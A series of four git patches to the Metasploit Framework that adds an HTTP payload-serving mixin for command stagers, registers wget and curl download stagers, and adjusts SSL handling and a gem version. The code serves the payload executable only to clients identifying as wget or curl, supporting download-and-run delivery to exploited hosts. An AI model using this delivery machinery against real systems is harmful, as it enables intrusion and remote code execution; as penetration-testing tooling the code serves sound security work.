From 58dd59fad53651d67cc454cddc3ac2f188a9b9d2 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 27 Dec 2016 06:59:03 -0600
Subject: [PATCH 1/4] Add Http mixin for CmdStager

---
 lib/msf/core/exploit/cmdstager/http.rb | 49 ++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 lib/msf/core/exploit/cmdstager/http.rb

diff --git a/lib/msf/core/exploit/cmdstager/http.rb b/lib/msf/core/exploit/cmdstager/http.rb
new file mode 100644
index 0000000000..9fbc1c0938
--- /dev/null
+++ b/lib/msf/core/exploit/cmdstager/http.rb
@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/tcp_server'
+require 'msf/core/exploit/http/server'
+
+module Msf::Exploit::CmdStager
+module Http
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Aggressive
+    ))
+  end
+
+  def start_service(opts = {})
+    if opts[:busybox] && (ssl = datastore['SSL'])
+      datastore['SSL'] = false
+    end
+
+    super
+    payload_uri = get_uri
+
+    if ssl
+      datastore['SSL'] = true
+    end
+
+    payload_uri
+  end
+
+  def resource_uri
+    if (datastore['URIPATH'] || '').end_with?(?/)
+      random_uri
+    else
+      super
+    end
+  end
+
+  def on_request_uri(cli, request)
+    if request['User-Agent'] =~ /^(?:Wget|curl)/
+      send_response(cli, exe)
+    else
+      send_not_found(cli)
+    end
+  end
+
+end
+end

From 34d358b8d7c9d043bf0978f4db30538f8df4f249 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 27 Dec 2016 07:00:39 -0600
Subject: [PATCH 2/4] Update CmdStager with new toys

---
 lib/msf/core/exploit/cmdstager.rb | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index c2cf9f4045..11c29a5c32 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -1,8 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/exploitation/cmdstager'
-require 'msf/core/exploit/exe'
-require 'msf/base/config'
+require 'msf/core/exploit/cmdstager/http'
 
 module Msf
 
@@ -10,6 +9,7 @@ module Msf
 module Exploit::CmdStager
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager::Http
 
   # Constant for stagers - used when creating an stager instance.
   STAGERS = {
@@ -21,7 +21,9 @@ module Exploit::CmdStager
     :vbs => Rex::Exploitation::CmdStagerVBS,
     :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
     :certutil => Rex::Exploitation::CmdStagerCertutil,
-    :tftp => Rex::Exploitation::CmdStagerTFTP
+    :tftp => Rex::Exploitation::CmdStagerTFTP,
+    :wget => Rex::Exploitation::CmdStagerWget,
+    :curl => Rex::Exploitation::CmdStagerCurl
   }
 
   # Constant for decoders - used when checking the default flavor decoder.
@@ -124,6 +126,11 @@ module Exploit::CmdStager
     end
 
     self.stager_instance = create_stager
+
+    if stager_instance.respond_to?(:http?) && stager_instance.http?
+      opts[:payload_uri] = start_service(opts)
+    end
+
     cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
     if cmd_list.nil? || cmd_list.length.zero?

From 0321000ea72e33b0b29d352c441b9028261b4760 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 29 Dec 2016 18:20:25 -0600
Subject: [PATCH 3/4] Update Http mixin for opts[:ssl]

1. Add opts[:ssl]
2. Remove opts[:busybox]
3. Refactor logic
4. Remove resource_uri
---
 lib/msf/core/exploit/cmdstager/http.rb | 19 ++++---------------
 1 file changed, 4 insertions(+), 15 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager/http.rb b/lib/msf/core/exploit/cmdstager/http.rb
index 9fbc1c0938..3135193235 100644
--- a/lib/msf/core/exploit/cmdstager/http.rb
+++ b/lib/msf/core/exploit/cmdstager/http.rb
@@ -15,28 +15,17 @@ module Http
   end
 
   def start_service(opts = {})
-    if opts[:busybox] && (ssl = datastore['SSL'])
-      datastore['SSL'] = false
-    end
+    datastore_ssl = datastore['SSL']
+    datastore['SSL'] = !!opts[:ssl]
 
     super
-    payload_uri = get_uri
 
-    if ssl
-      datastore['SSL'] = true
-    end
+    payload_uri = get_uri
+    datastore['SSL'] = datastore_ssl
 
     payload_uri
   end
 
-  def resource_uri
-    if (datastore['URIPATH'] || '').end_with?(?/)
-      random_uri
-    else
-      super
-    end
-  end
-
   def on_request_uri(cli, request)
     if request['User-Agent'] =~ /^(?:Wget|curl)/
       send_response(cli, exe)

From 36e0bad42165d38a7099fd020c4682f94428f257 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 30 Dec 2016 00:41:13 -0600
Subject: [PATCH 4/4] Update rex-exploitation to 0.1.7

---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 0dcd64eb9d..ae6e9430fa 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.4)
+    rex-exploitation (0.1.7)
       jsobfu
       metasm
       rex-arch